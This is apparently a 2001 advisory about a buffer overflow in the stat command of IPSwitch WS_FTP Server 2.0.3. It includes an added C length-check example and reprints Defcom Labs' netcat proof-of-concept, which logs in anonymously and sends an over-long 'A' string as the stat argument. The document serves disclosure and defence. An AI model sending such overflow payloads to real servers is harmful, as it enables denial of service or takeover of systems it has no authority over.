Unchecked Buffer in IPSwitch WS_FTP
A vulnerability exists in IPSwitch’s WS_FTP Server 2.0.3 that lets a potential remote attacker gain system-level access to servers running the FTP daemon.
November 5, 2001
Reported November 5, 2001, by Defcom Labs.
VERSION AFFECTED
IPSwitch WS_FTP FTP Server 2.0.3 for Windows XP, Windows 2000, and Windows NT
DESCRIPTION
A vulnerability exists in IPSwitch’s WS_FTP Server 2.0.3 that lets a potential remote attacker gain system-level access to servers running the FTP daemon. This vulnerability results from a buffer overrun condition in the parsing code used to process the stat command. Sending a stat command to the vulnerable server with an argument greater than 479 bytes triggers the overflow.
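The following added example is not IPSwitch's code and is not part of the original advisory. It sketches the length check a stat handler needs: measure the argument first, refuse anything over the limit, and only then copy. The function names, the reply-code enum, and the use of 479 bytes as the limit (taken from the threshold above) are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define STAT_ARG_MAX 479 /* assumption: longest argument the advisory treats as safe */
enum { REPLY_NOT_STAT = 0, REPLY_OK = 211, REPLY_SYNTAX = 501 }; /* illustrative codes */

/* Return the argument that follows `verb` (case-insensitive), or NULL if the line uses another verb. */
static const char *match_verb(const char *line, const char *verb)
{
    size_t i = 0;
    for (; verb[i] != '\0'; i++)
        if (toupper((unsigned char)line[i]) != verb[i])
            return NULL;
    if (line[i] != '\0' && line[i] != ' ' && line[i] != '\r' && line[i] != '\n')
        return NULL; /* "STATUS" is not "STAT" */
    while (line[i] == ' ')
        i++;
    return line + i;
}

/* Measure the stat argument before copying it; an over-long argument is
   refused with a syntax error instead of being written past the buffer. */
int handle_stat(const char *line, char *out, size_t out_cap)
{
    const char *arg = match_verb(line, "STAT");
    if (arg == NULL)
        return REPLY_NOT_STAT;
    size_t len = strcspn(arg, "\r\n"); /* the argument ends at CR/LF */
    if (len > STAT_ARG_MAX || len >= out_cap)
        return REPLY_SYNTAX;
    memcpy(out, arg, len);
    out[len] = '\0';
    return REPLY_OK;
}

/* Constructed input: "stat " followed by n 'A' bytes and CRLF. */
int probe_stat(size_t n)
{
    static char line[1024], out[STAT_ARG_MAX + 1];
    if (n > sizeof line - 8)
        return -1;
    memcpy(line, "stat ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 3);
    return handle_stat(line, out, sizeof out);
}

int main(void) { return probe_stat(480) == REPLY_SYNTAX ? 0 : 1; }
```

The same length test, applied to control-channel logs or captures, flags sessions that send a stat argument longer than 479 bytes.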
DEMONSTRATION
Defcom Labs provided the following demonstration as proof-of-concept:
C:toolsweb>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success